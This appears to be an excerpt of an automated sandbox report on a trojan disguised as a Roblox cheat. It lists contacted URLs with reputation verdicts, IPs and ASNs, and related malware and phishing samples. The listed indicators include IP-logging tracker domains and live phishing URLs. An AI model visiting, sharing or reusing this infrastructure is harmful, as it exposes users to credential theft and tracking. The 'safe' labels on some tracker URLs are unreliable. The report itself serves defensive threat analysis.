                                  https://client-telemetry.roblox.cominatoreyrobloxPX1instaler.exe, 00000002.00000002.1453315290.0000000001B80000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448345674.0000000001B78000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://cdn.iplogger.org/redirect/logo-dark.pngchromecache_64.20.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://wwww.certigna.fr/autorites/0mrobloxPX1instaler.exe, 00000002.00000003.1446034121.0000000003F67000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446787528.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446863326.0000000003F8E000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447206724.0000000003F92000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://ocsp.accv.es0robloxPX1instaler.exe, 00000002.00000003.1447017459.0000000003F62000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1449706117.0000000003F63000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454276854.0000000003F64000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrappere:0.0ms)robloxPX1instaler.exe, 00000002.00000003.1326917896.0000000004004000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://client-telemetry.roblox.comerobloxPX1instaler.exe, 00000002.00000003.1446077514.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446318793.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445368599.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1449216456.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454531878.000000000400D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://wwww.certigna.fr/autorites/robloxPX1instaler.exe, 00000002.00000003.1446034121.0000000003F67000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447390699.0000000003F7B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446787528.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447677703.0000000003F7F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446907771.0000000003F6D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454321758.0000000003F7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio64xrobloxPX1instaler.exe, 00000002.00000003.1446034121.0000000003F67000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448751210.0000000003F6F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446787528.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447771638.0000000003F6F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446907771.0000000003F6D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454301246.0000000003F70000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://curl.se/docs/alt-svc.htmlroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://cdn.iplogger.org/redirect/brand.pngchromecache_64.20.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/certroblox cheat.exe, robloxPX1instaler.exe.0.dr, cacert.pem.2.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.quovadisglobal.com/cpsrobloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446970284.0000000001C1A000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447534893.0000000001C1B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446536022.0000000001C13000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper.robloxPX1instaler_DD2F4.log.2.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.securetrust.com/STCA.crlrobloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445969855.0000000001C1F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447552442.0000000001C26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0robloxPX1instaler.exe, 00000002.00000003.1447017459.0000000003F62000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1449706117.0000000003F63000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447120080.0000000001C35000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445969855.0000000001C1F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454276854.0000000003F64000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.accv.es/legislacion_c.htmrobloxPX1instaler.exe, 00000002.00000003.1447017459.0000000003F62000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayeronsrobloxPX1instaler.exe, 00000002.00000003.1446077514.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446318793.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445368599.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1449216456.000000000400D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454531878.000000000400D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.xrampsecurity.com/XGCA.crl0robloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446970284.0000000001C1A000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447534893.0000000001C1B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1445880408.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446536022.0000000001C13000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1260774727.0000000001C01000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448775676.0000000001C1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio64robloxPX1instaler.exe, 00000002.00000003.1446034121.0000000003F67000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448751210.0000000003F6F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446787528.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447771638.0000000003F6F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446907771.0000000003F6D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454301246.0000000003F70000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://iplogger.org/rules/chromecache_64.20.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://bit.ly/1eMQ42Uroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.certigna.fr/certignarootca.crl01robloxPX1instaler.exe, 00000002.00000003.1446034121.0000000003F67000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447390699.0000000003F7B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446787528.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446863326.0000000003F8E000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447677703.0000000003F7F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446907771.0000000003F6D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447206724.0000000003F92000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1448098395.0000000003F85000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.cert.fnmt.es/dpcs/robloxPX1instaler.exe, 00000002.00000003.1446034121.0000000003F67000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447951731.0000000003F87000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447390699.0000000003F7B000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446787528.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1447677703.0000000003F7F000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446907771.0000000003F6D000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454321758.0000000003F7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.winimage.com/zLibDllroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerpanyrobloxPX1instaler.exe, 00000002.00000003.1447206724.0000000003FAB000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446034121.0000000003F67000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446787528.0000000003F69000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446863326.0000000003F8E000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454406604.0000000003FAB000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1446944435.0000000003FA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://s3.amazonaws.com/robloxPX1instaler.exe.0.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.accv.es00robloxPX1instaler.exe, 00000002.00000003.1447017459.0000000003F62000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000003.1449706117.0000000003F63000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.1454276854.0000000003F64000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://2no.co/chromecache_64.20.drfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper.hrobloxPX1instaler.exe, 00000002.00000003.1327018098.0000000001C0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ecsv2.roblox.com/client/pberoblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://2no.co/redirect-2chromecache_64.20.drfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperaterobloxPX1instaler.exe, 00000002.00000003.1326917896.0000000004004000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  88.212.201.198
                                  		counter.yadro.ruRussian Federation
                                  		39134UNITEDNETRUfalse
                                  172.217.18.4
                                  		www.google.comUnited States
                                  		15169GOOGLEUSfalse
                                  18.239.18.53
                                  		d2v57ias1m20gl.cloudfront.netUnited States
                                  		16509AMAZON-02USfalse
                                  128.116.21.3
                                  		edge-term4-ams2.roblox.comUnited States
                                  		22697ROBLOX-PRODUCTIONUSfalse
                                  172.67.132.113
                                  		cdn.iplogger.orgUnited States
                                  		13335CLOUDFLARENETUSfalse
                                  239.255.255.250
                                  		unknownReserved
                                  		unknownunknownfalse
                                  35.190.80.1
                                  		a.nel.cloudflare.comUnited States
                                  		15169GOOGLEUSfalse
                                  88.212.201.204
                                  		unknownRussian Federation
                                  		39134UNITEDNETRUfalse
                                  172.67.149.76
                                  		2no.coUnited States
                                  		13335CLOUDFLARENETUSfalse

                                  Private

                                  IP
                                  192.168.2.7
                                  192.168.2.5
                                  127.0.0.1

                                  General Information

                                  Joe Sandbox version:40.0.0 Tourmaline
                                  Analysis ID:1484380
                                  Start date and time:2024-07-30 00:45:10 +02:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 7m 39s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:26
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:roblox cheat.exe
                                  Detection:MAL
                                  Classification:mal90.troj.spyw.evad.winEXE@26/17@22/12
                                  EGA Information:
                                  • Successful, ratio: 66.7%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 142.250.185.227, 108.177.15.84, 172.217.16.206, 34.104.35.123, 93.184.221.240, 142.250.185.131, 142.250.186.110
                                  • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, time.windows.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target roblox cheat.exe, PID 4840 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: roblox cheat.exe

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  18:46:12API Interceptor3x Sleep call for process: robloxPX1instaler.exe modified

                                  LLM Input / Output

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  172.67.132.113FEB32B614BC7F38CC0B553B5FEE80B7E68AD8AE78DF1F1CAE4016A5AA1C4677A.exeGet hashmaliciousBdaejecBrowse
                                    65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeGet hashmaliciousBdaejec, SocelarsBrowse
                                      4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                        4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                          4C49F078D9E8409D98D83AEBA2C037339680B2ABF7471B599E736A7AD99FB08D.exeGet hashmaliciousBdaejec, SocelarsBrowse
                                            1719859269.0326595_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, XmrigBrowse
                                              1719520929.094843_setup.exeGet hashmaliciousLummaC Stealer, Mars Stealer, PrivateLoader, PureLog Stealer, Socks5Systemz, Stealc, VidarBrowse
                                                1Cvd8TyYPm.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRATBrowse
                                                  SecuriteInfo.com.Trojan.Siggen28.55231.10056.8041.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, SystemBC, Vidar, zgRATBrowse
                                                    SecuriteInfo.com.Win64.DropperX-gen.20168.7257.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, RisePro Stealer, Stealc, Vidar, zgRATBrowse
                                                      88.212.201.198http://www.puusektori.fiGet hashmaliciousGRQ ScamBrowse
                                                      • counter.yadro.ru/hit;fims2?t38.6;r;s1280*1024*24;uhttp%3A//www.puusektori.fi/;hkuinka%20monta%20opintoviikkoa%20on%20ammatillisen%20perustutkinnon%20laajuus;0.6661644312023942
                                                      njw.exeGet hashmaliciousUnknownBrowse
                                                      • counter.yadro.ru/hit;counter1?r;s1280*1024*32;uhttp%3A//www.all-bearings.narod.ru/secondpage.html;0.5443641556055339
                                                      239.255.255.250https://kapitan.co.ke/ch/f/signin.phpGet hashmaliciousUnknownBrowse
                                                        http://2323.pages.dev/Get hashmaliciousUnknownBrowse
                                                          https://nadiperformance-f5135f.ingress-earth.ewp.live/wp-content/plugins/kredittikay%C4%B1l/pages/region.phpGet hashmaliciousUnknownBrowse
                                                            http://www.kjecom.com/serviciodecorreo/login/Get hashmaliciousUnknownBrowse
                                                              http://pub-1dce8f5133cd41708dc3ec7e6864bb58.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                http://s.id/helpcenter84619Get hashmaliciousHTMLPhisherBrowse
                                                                  http://matmcst.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                    http://pub-91cd24230d1a47f198e6036ff20062e7.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                      http://pub-150673a82d0042c3be06302794553f66.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                        http://connectinmate.org/@@@/cancelss/index.phpGet hashmaliciousHTMLPhisherBrowse
                                                                          18.239.18.53http://hwylovermk.shop/product_details/5509027.htmlGet hashmaliciousUnknownBrowse
                                                                            https://na3.docusign.net/Signing/EmailStart.aspx?a=d12aabf1-0919-4f4f-92ab-0ff30b7ce84c&acct=88aa9bf9-9255-4306-b6d1-c7e74d5a654b&er=23711531-a6e1-4fe3-b437-430c24a72d79Get hashmaliciousUnknownBrowse
                                                                              https://ctfoodshare.orgGet hashmaliciousHTMLPhisherBrowse
                                                                                http://site.foodshare.org/site/DocServerGet hashmaliciousHTMLPhisherBrowse
                                                                                  https://abdelhamied.com/?gclid=Get hashmaliciousUnknownBrowse
                                                                                    https://slack.com/help/articles/29414264463635Get hashmaliciousUnknownBrowse
                                                                                      Authorization code - SO10552124.PDFGet hashmaliciousUnknownBrowse
                                                                                        https://ipfs.io/ipfs/bafybeighp4krlvehs33pimsa3ka7aimkt3miqblm5arwkobl432i3aysgq/WeTransfer%20domain.html/Get hashmaliciousHTMLPhisherBrowse
                                                                                          https://sg.bill.com/ls/click?upn=u001.se4SimOEkqgQ32qtQ-2B6PfDaaAn3xJe8O-2FErO3-2BCky2vLtBZLvhZq86oGuxZTOnrx6gh9ygU3gb9JKUvQraPRMDLNEWU-2FboCgv6JKGVFF5ZmAFFVNTpwNhFrszPCuHOoXmd42mE-2FxQa911yauJubc0OblF9Qqd1ecaCJwDHrE-2FrsX0zfywuzzXI1MI7dyAyVRLkRFwv0ptobKWnVn6FzPxmVMCOJCx1aQ7QNkyBRq2RI-3DgVTV_by1gJSnDV04YrJyEyhOyU-2FrdL1lFArauDhnpw8uvCUHkLpxtBILt4lN05W-2FmPZY32jADYnq176HkYVt-2F1RoBLpDlPoT0lRAm0MYPQVkoSfIdGfKU95F0t6NJsgdilfeFT3o89S2N-2FIM0BQj3x8vTARx8dc8H2J7stSjHnMjcnKidaQFJIPSuI7fLy7yE38DTqcpMpEPOoHVa6p64rK4Afi-2FaNdSDAsJMxpRagPF5z9UKp-2Bl8HyCtDqt9rV-2FwJGyu0BB14b7gdKlLa7tN5EgJqkmfK04Aup0S-2FdpQY-2F0mHzVTBVMlSZnCPiN-2Ffp66aL5BJO46yoA7Nav-2F4dPPMV0nQLQpR30V7hyVRX7zwav3FuWi-2F3bmfX8HQ8pMcFmWqOosM1CJ4lnQ68glhbMc7tWNJo0F87zLAEHCo0U-2Bcl5KNzwX-2BWXFezmlkgMAhRAUpithGet hashmaliciousUnknownBrowse
                                                                                            https://in.xero.com/LPhAf4Uu8GqGOPHDnymb0iopYL0hBHD11XrSzhazGet hashmaliciousUnknownBrowse
                                                                                              128.116.21.3Roblox Account Manager.exeGet hashmaliciousUnknownBrowse

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                cdn.iplogger.org4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                                                • 172.67.132.113
                                                                                                4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                                                • 104.21.4.208
                                                                                                rpeticao_inicial.vbsGet hashmaliciousUnknownBrowse
                                                                                                • 172.67.132.113
                                                                                                DN0yi6SRZL.exeGet hashmaliciousUnknownBrowse
                                                                                                • 148.251.234.83
                                                                                                https://maper.infoGet hashmaliciousUnknownBrowse
                                                                                                • 148.251.234.83
                                                                                                p68hEdbp8M.exeGet hashmaliciousGurcu Stealer, RedLine, VidarBrowse
                                                                                                • 148.251.234.83
                                                                                                6wXMsDIz1A.exeGet hashmaliciousGurcu Stealer, RedLineBrowse
                                                                                                • 148.251.234.83
                                                                                                SJv6Gz8cGp.exeGet hashmaliciousRedLine, Typhon LoggerBrowse
                                                                                                • 148.251.234.83
                                                                                                12D3EC70F3A079AE0216EE7B56722E2369EB664DE0036.exeGet hashmaliciousAzorult, RedLineBrowse
                                                                                                • 148.251.234.83
                                                                                                12D3EC70F3A079AE0216EE7B56722E2369EB664DE0036.exeGet hashmaliciousAzorult, RedLineBrowse
                                                                                                • 148.251.234.83
                                                                                                edge-term4-ams2.roblox.comRdJ73GU3N1.exeGet hashmaliciousNjratBrowse
                                                                                                • 128.116.21.4
                                                                                                SecuriteInfo.com.Win32.BackdoorX-gen.25355.5373.exeGet hashmaliciousUnknownBrowse
                                                                                                • 128.116.21.4
                                                                                                Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                • 128.116.21.4
                                                                                                Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                • 128.116.21.3
                                                                                                counter.yadro.ruLisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 88.212.201.204
                                                                                                LisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 88.212.201.204
                                                                                                http://ads.livetv799.meGet hashmaliciousUnknownBrowse
                                                                                                • 88.212.202.52
                                                                                                4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                                                • 88.212.201.204
                                                                                                4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                                                • 88.212.202.52
                                                                                                file.exeGet hashmaliciousXenoRATBrowse
                                                                                                • 88.212.202.52
                                                                                                http://singlelogin.rsGet hashmaliciousUnknownBrowse
                                                                                                • 88.212.201.198
                                                                                                https://onpagvus.storeGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 88.212.201.198
                                                                                                http://cb00287.tw1.ru/Get hashmaliciousUnknownBrowse
                                                                                                • 88.212.201.198
                                                                                                https://disk.yandex.ru/d/ArN8zL4WbJeexQGet hashmaliciousPanda StealerBrowse
                                                                                                • 88.212.201.198
                                                                                                2no.coC0ED98D08381257B540A04C0868ECD6A628649AA70FEBCBE03778BAE532FB5BE.exeGet hashmaliciousBdaejec, BitCoin Miner, XmrigBrowse
                                                                                                • 104.21.79.229
                                                                                                lSmb6nDsrC.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                • 104.21.79.229
                                                                                                setup.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.21.79.229
                                                                                                setup.exeGet hashmaliciousUnknownBrowse
                                                                                                • 104.21.79.229
                                                                                                file.exeGet hashmaliciousXenoRATBrowse
                                                                                                • 172.67.149.76
                                                                                                Og1SeeXcB2.exeGet hashmaliciousRemcos, Blank Grabber, PrivateLoader, SmokeLoaderBrowse
                                                                                                • 104.21.79.229
                                                                                                file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                • 104.21.79.229
                                                                                                rpeticao_inicial.vbsGet hashmaliciousUnknownBrowse
                                                                                                • 172.67.149.76
                                                                                                setup.htaGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                • 104.21.79.229
                                                                                                setup.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                • 104.21.79.229

                                                                                                ASNs

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                UNITEDNETRUUniversal Radio Programmer.pdfGet hashmaliciousUnknownBrowse
                                                                                                • 88.212.201.204
                                                                                                LisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 88.212.201.204
                                                                                                LisectAVT_2403002A_312.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 88.212.201.204
                                                                                                http://ads.livetv799.meGet hashmaliciousUnknownBrowse
                                                                                                • 88.212.202.52
                                                                                                4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                                                • 88.212.201.204
                                                                                                4FE08CC381F8F4EA6E3D8E34FDDF094193CCBBCC1CAE7217F0233893B9C566A2.exeGet hashmaliciousBabadeda, BdaejecBrowse
                                                                                                • 88.212.201.204
                                                                                                file.exeGet hashmaliciousXenoRATBrowse
                                                                                                • 88.212.202.52
                                                                                                http://singlelogin.rsGet hashmaliciousUnknownBrowse
                                                                                                • 88.212.202.52
                                                                                                https://onpagvus.storeGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 88.212.201.204
                                                                                                https://disk.yandex.ru/d/ArN8zL4WbJeexQGet hashmaliciousPanda StealerBrowse
                                                                                                • 88.212.201.204
                                                                                                AMAZON-02UShttps://kapitan.co.ke/ch/f/signin.phpGet hashmaliciousUnknownBrowse
                                                                                                • 18.193.237.78
                                                                                                http://pub-1dce8f5133cd41708dc3ec7e6864bb58.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                • 52.58.254.253
                                                                                                http://pub-91cd24230d1a47f198e6036ff20062e7.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                • 35.156.224.161
